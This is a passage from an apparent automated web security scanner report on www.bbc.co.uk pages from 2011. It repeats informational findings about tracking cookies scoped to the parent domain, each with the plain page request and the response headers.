GET /news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=764
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.46. http://www.bbc.co.uk/news/health-12409700  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:45 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:02:45 GMT
Connection: close
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.47. http://www.bbc.co.uk/news/health-12415801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:46 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:02:46 GMT
Connection: close
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.48. http://www.bbc.co.uk/news/magazine-12392811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.49. http://www.bbc.co.uk/news/magazine-12418046  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=636
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.50. http://www.bbc.co.uk/news/magazine-12428754  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:48 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:48 GMT
Connection: close
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.51. http://www.bbc.co.uk/news/magazine-12428759  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:49 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:49 GMT
Connection: close
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.52. http://www.bbc.co.uk/news/science-environment-12412662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12412662

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:50 GMT
Keep-Alive: timeout=10, max=754
Expires: Sat, 12 Feb 2011 02:02:50 GMT
Connection: close
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=347dd5b5ce2a340ae7f18f05e125b582721989735070e1da843b3ad564517cdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:50 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.53. http://www.bbc.co.uk/news/science-environment-12417858  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12417858

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=798
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=948d15f55e4af4cbc9506d9791a9dbd248e5cac4c020a1c93b8b637f88c4864c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.54. http://www.bbc.co.uk/news/science-environment-12424620  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/science-environment-12424620

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:51 GMT
Keep-Alive: timeout=10, max=742
Expires: Sat, 12 Feb 2011 02:02:51 GMT
Connection: close
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24bd35052e5ae45b586d3412f10916bd75e7eb6aa0400263d7fd6a702573da8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 46470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.55. http://www.bbc.co.uk/news/technology-12419672  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12419672

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/technology-12419672 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:52 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:52 GMT
Connection: close
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4adc5b54e0a54dc0a5670a631741a202a9d9cb860401179bb3b222a563c34760Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:52 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.56. http://www.bbc.co.uk/news/technology-12429808  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/technology-12429808 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94dd95e52e1a548dcac1b16be17c735c87363dcf70a0a1c92b6be322574de9ce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.57. http://www.bbc.co.uk/news/uk-12427839  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-12427839 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04cd85857e9a64ee181d5551d121862c55bfe53e20309273c7ad8af045b36a8e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.58. http://www.bbc.co.uk/news/uk-12435618  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12435618

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-12435618 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=762
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.59. http://www.bbc.co.uk/news/uk-12437244  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-12437244 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:55 GMT
Keep-Alive: timeout=10, max=768
Expires: Sat, 12 Feb 2011 02:02:55 GMT
Connection: close
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.60. http://www.bbc.co.uk/news/uk-england-london-12438040  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-england-london-12438040 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.61. http://www.bbc.co.uk/news/uk-northern-ireland-12427112  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-northern-ireland-12427112 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.62. http://www.bbc.co.uk/news/uk-northern-ireland-12428837  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-northern-ireland-12428837 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
